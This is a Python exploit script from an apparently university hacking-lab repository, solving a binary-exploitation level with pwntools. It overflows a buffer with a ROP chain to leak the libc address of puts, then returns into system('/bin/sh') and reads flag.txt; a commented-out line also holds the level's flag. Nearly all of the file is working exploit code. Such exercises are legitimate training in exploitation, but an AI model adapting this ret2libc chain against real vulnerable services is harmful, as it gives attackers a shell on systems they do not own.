ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3b328852635936ed8858f58935cb76ea2c52d798
hacklab/4/level9/test.py
Eggert Jung dca7fbe758 9
2026-01-07 19:12:31 +01:00

79 lines
2.0 KiB
Python
Raw Blame History

# 0x0000000000401263 : pop rdi ; ret
from pwn import *
HOST, PORT = "localhost", 4009
#HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4009
#p = remote(HOST, PORT)
p = process('./level9')
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
#p.sendline(payload.encode())
#print("sending: ", end='')
#print(payload)
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset = libc.symbols['puts'] # e.g. 0x080aa0
system_offset = libc.symbols['system'] # e.g. 0x04f550
binsh_offset = next(libc.search(b'/bin/sh')) # e.g. 0x1b75aa
print(hex(puts_offset))
print(hex(system_offset))
print(hex(binsh_offset))
elf = ELF('./level9')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
#help_input = p.recvline()
#print(help_input)
#puts_abs = int(help_input[-15:-1],16)
#print(hex(puts_abs))
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40
payload += p64(0x0000000000401264)
payload += p64(0x0000000000401263)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
p.sendline(payload)
print("send payload: ", payload)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
puts_abs = int.from_bytes(leak[:-1], 'little')
print("[+] leaked puts:", hex(puts_abs))
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40
#payload += p64(0x0000000000401264)
payload += p64(0x0000000000401263)
payload += p64(puts_abs - puts_offset + binsh_offset)
payload += p64(puts_abs - puts_offset + system_offset)
p.sendline(payload)
print("payload: ",payload)
p.sendline("cat flag.txt".encode())
p.interactive()
Reference in New Issue View Git Blame Copy Permalink